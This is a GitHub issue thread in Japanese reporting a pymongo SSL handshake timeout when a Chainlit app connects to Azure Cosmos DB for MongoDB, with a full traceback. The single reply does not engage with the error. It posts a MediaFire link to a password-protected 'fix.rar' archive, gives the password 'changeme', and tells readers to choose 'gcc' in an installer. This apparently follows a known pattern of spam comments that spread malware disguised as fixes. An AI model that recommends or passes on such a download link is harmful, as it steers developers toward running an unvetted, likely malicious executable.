### ISSUE TITLE
MongoDBとAzure Cosmos DB for MongoDBへの接続中にSSLハンドシェイクがタイムアウトする

### ISSUE THREAD

**Issue by da-yamaguchi** [da-yamaguchi/chainlit#2]
【エラー内容】  
```
Aug 26 11:41:46 www10353uj chainlit[21934]: Traceback (most recent call last):
Aug 26 11:41:46 www10353uj chainlit[21934]:   File "/home/d-yamaguchi/Github/chainlit/chainlit_env/lib/python3.10/site-packages/pymongo/pool.py", line 1325, in _configured_socket
Aug 26 11:41:46 www10353uj chainlit[21934]:     ssl_sock = ssl_context.wrap_socket(sock, server_hostname=host)
Aug 26 11:41:46 www10353uj chainlit[21934]:   File "/usr/lib/python3.10/ssl.py", line 513, in wrap_socket
Aug 26 11:41:46 www10353uj chainlit[21934]:     return self.sslsocket_class._create(
Aug 26 11:41:46 www10353uj chainlit[21934]:   File "/usr/lib/python3.10/ssl.py", line 1100, in _create
Aug 26 11:41:46 www10353uj chainlit[21934]:     self.do_handshake()
Aug 26 11:41:46 www10353uj chainlit[21934]:   File "/usr/lib/python3.10/ssl.py", line 1371, in do_handshake
Aug 26 11:41:46 www10353uj chainlit[21934]:     self._sslobj.do_handshake()
Aug 26 11:41:46 www10353uj chainlit[21934]: TimeoutError: _ssl.c:990: The handshake operation timed out
Aug 26 11:41:46 www10353uj chainlit[21934]: The above exception was the direct cause of the following exception:
Aug 26 11:41:46 www10353uj chainlit[21934]: Traceback (most recent call last):
Aug 26 11:41:46 www10353uj chainlit[21934]:   File "/home/d-yamaguchi/Github/chainlit/chainlit_env/lib/python3.10/site-packages/pymongo/mongo_client.py", line 1805, in _process_periodic_tasks
Aug 26 11:41:46 www10353uj chainlit[21934]:     self._topology.update_pool()
Aug 26 11:41:46 www10353uj chainlit[21934]:   File "/home/d-yamaguchi/Github/chainlit/chainlit_env/lib/python3.10/site-packages/pymongo/topology.py", line 631, in update_pool
Aug 26 11:41:46 www10353uj chainlit[21934]:     server.pool.remove_stale_sockets(generation)
Aug 26 11:41:46 www10353uj chainlit[21934]:   File "/home/d-yamaguchi/Github/chainlit/chainlit_env/lib/python3.10/site-packages/pymongo/pool.py", line 1648, in remove_stale_sockets
Aug 26 11:41:46 www10353uj chainlit[21934]:     conn = self.connect()
Aug 26 11:42:29 www10353uj chainlit[21934]:   File "/home/d-yamaguchi/Github/chainlit/chainlit_env/lib/python3.10/site-packages/pymongo/pool.py", line 1695, in connect
Aug 26 11:42:29 www10353uj chainlit[21934]:     sock = _configured_socket(self.address, self.opts)
Aug 26 11:42:29 www10353uj chainlit[21934]:   File "/home/d-yamaguchi/Github/chainlit/chainlit_env/lib/python3.10/site-packages/pymongo/pool.py", line 1339, in _configured_socket
Aug 26 11:42:29 www10353uj chainlit[21934]:     _raise_connection_failure(address, exc, "SSL handshake failed: ", timeout_details=details)
Aug 26 11:42:29 www10353uj chainlit[21934]:   File "/home/d-yamaguchi/Github/chainlit/chainlit_env/lib/python3.10/site-packages/pymongo/pool.py", line 419, in _raise_connection_failure
Aug 26 11:42:29 www10353uj chainlit[21934]:     raise NetworkTimeout(msg) from error
Aug 26 11:42:29 www10353uj chainlit[21934]: pymongo.errors.NetworkTimeout: SSL handshake failed: c.link-tech-cosmos-db-for-mongodb.mongocluster.cosmos.azure.com:10260: _ssl.c:990: The handshake operation timed out (configured timeouts: socketTimeoutMS: 30000.0ms, connectTimeoutMS: 5000.0ms)
```

【原因】  
https://chatgpt.com/share/95c4b0ab-e60c-4641-ab3a-3fa7d74cd8c4

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
